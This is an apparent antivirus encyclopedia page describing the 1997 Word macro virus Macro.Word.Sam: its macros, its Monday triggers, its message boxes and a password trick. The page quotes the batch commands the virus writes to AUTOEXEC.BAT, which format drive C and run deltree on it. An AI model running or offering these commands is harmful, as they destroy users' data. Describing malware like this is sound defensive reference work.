Main Menu
Home
Bookmark
Contact Us



 
Macro.Word.Sa Viruses Information

Name: Macro.Word.Sa
Category: Viruses
Description: Details
Macro.Word.Sam

This is a very dangerous Chinese specific encrypted macro-virus. It contains seven macros: AutoOpen, AutoExec, AutoNew, FileSaveAs, ToolsMacro, FileTemplates, and Monday.
The virus infects the system and documents upon AutoNew, AutoOpen and FileSaveAs calls. It contains the following comments:
Created by Samuel Lin
Latest Date Feb 8 '97

On Mondays at 10:00, the virus overwrites the C:AUTOEXEC.BAT file with the following commands:
@echo off
cls
echo HAVE A GOOD TIME
echo --Taiwan Dark Monday--
echo y|format c: /u /v:MONDAY >nul
deltree /y c: >nul

Then it displays the MessageBox:
Taiwan Dark Monday
Today is Monday, do you work hard?
It's tea time now!
Let's go out and have some funall

On Mondays with the date 13t, it deletes the C:WINDOWS*.INI files and displays the following Message Box:
It Is Dark Monday...

On Mondays on any another date, the virus clears the contents of the current document and displays the following Message Box:
Taiwan Dark Monday
Today is Monday, did you work hard?
Let's take a rest and have some fun... :-)

Upon FileTemplates calls, the virus erases the current document and displays the following Message Box:
Taiwan Dark Monday
Go ahead! Make my day! ! !

It then inserts the text "TAIWAN DARK MONDAY" into the current document and prints it.
Upon ToolsMacro calls, the virus sets the password "Samuel" to the current document, then displays the following Message Box:
Taiwan Dark Monday
You may insert password to access here... ^_^

and waits for "Samuel" input. In case of wrong string, the virus displays:
Taiwan Dark Monday
WRONG PASSWORD!!!
You don't have right to execute this macro command!! :P
Access Denied!!!



Top Viruses Visited Pages:
Invader. - 239 visits
not-a-virus:RiskWare.Tool.RegPatch. - 73 visits
Worm.P2P.Harex. - 66 visits
not-a-virus:RemoteAdmin.Win32.RAdmin.2 - 60 visits
Small.58. - 56 visits
Coito.64 - 54 visits
I-Worm.Mapson. - 48 visits
Win32.Hidra - 43 visits
Win16.Klon.1177 - 42 visits
Marine.500 - 35 visits

Random Viruses Pages:
LoadErro
Macro.Word.Tele-Se
WinScipt.AV
Gondor.307
I-Worm.Stopin.
Search.35
RedArc.32
I-Worm.Mypart
Dieg.158
Win32.Magi


 


© 2006-2008 spyware32.com - Privacy Policy